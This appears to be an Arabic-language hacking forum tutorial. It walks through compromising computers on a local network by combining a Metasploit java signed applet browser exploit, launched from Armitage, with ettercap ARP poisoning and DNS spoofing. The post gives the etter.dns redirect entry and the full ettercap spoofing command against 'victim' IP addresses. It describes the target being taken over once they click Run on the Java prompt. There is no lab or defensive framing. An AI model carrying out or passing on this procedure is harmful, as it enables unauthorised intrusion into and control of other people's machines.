
ان شا الله الجميع بخير
شرح اليوم اختراق ويندوز
xp/7/vista/LINUX/MAC OS
طبعا الاختراق داخليه وليس خارجي راح نستعمل ثغرة الجافا

كيف يتم الاختراق بعد تجهيز الثغرة راح نعمل سبوف على الضحية
الذي نريد اختراقو عندما يفتح اي موقع على المتصفحة سيتم استدعاء الجافا
وسيتم اختراقهو طيب نشوف الشرح وراح نفهم
نبدء على بركة الله
اول افتح التيرمنال وادخل الامر التالي
خذ الايبي الخاص بك copy
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 966x125. |

ثم افتح التيرمنال من جديد ضع الامر التالي لنعدل
كود:
gedit /usr/local/share/ettercap/etter.dns
ثم انزل الى الاسفل وضع الايبي الخاص بك ونعمل حفظ كما هوه موضح بالصوره
A 192.168.1.XXX *

ثم نذهب ونفتح الارمتيج ARMITAGE
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1003x326. |


بعد ان فتحنا الارميتاج نذهب الى exploit
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 999x403. |

ثم الى MULTI كما هوه موضح بالصوره
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1021x585. |

ثم الى BROWSER
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1021x589. |

ثم نختار الثغرة java signed applet
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1013x589. |

هنا ستفتح لك نافذة ونعمل الاتصال على 80 بدل 8080
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1022x587. |

وهنا في خانة URIPATH نضع /
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1009x583. |

ثم اضغط launch لتشتغل الثغرة
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 800x539. |

تمام الى هنا نرجع نفتح التيرمنال عشان نعمل dns_spoof على الضحية المراد اختراقهو
نضع الامر التالي
كود:
ettercap -T -i eth0 -q -M arp:remote /192.168.1.105/ /192.168.1.106/ -P dns_spoof
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 983x62. |

ثم نضغط enter
تمام هيك كل شيئ جاهز لاحظ عندما يدخل الضحية الى اي متصفحة سيظهر نافذة الجافا
عند الضحية ينقر على run سيتم اختراقهو
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 769x432. |

بعد ان ضغط الضحية على run ارجع الى الارميتاج وستلاحظ ان تم اختراقهو
 |
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1015x675. |

انتهينا ارجو ان اكون وفقت بالشرح
والله الواحد بشرح عشان الكل يستفيد لا اكثر
لا نريد الى كلمة شكر ( تحياتي )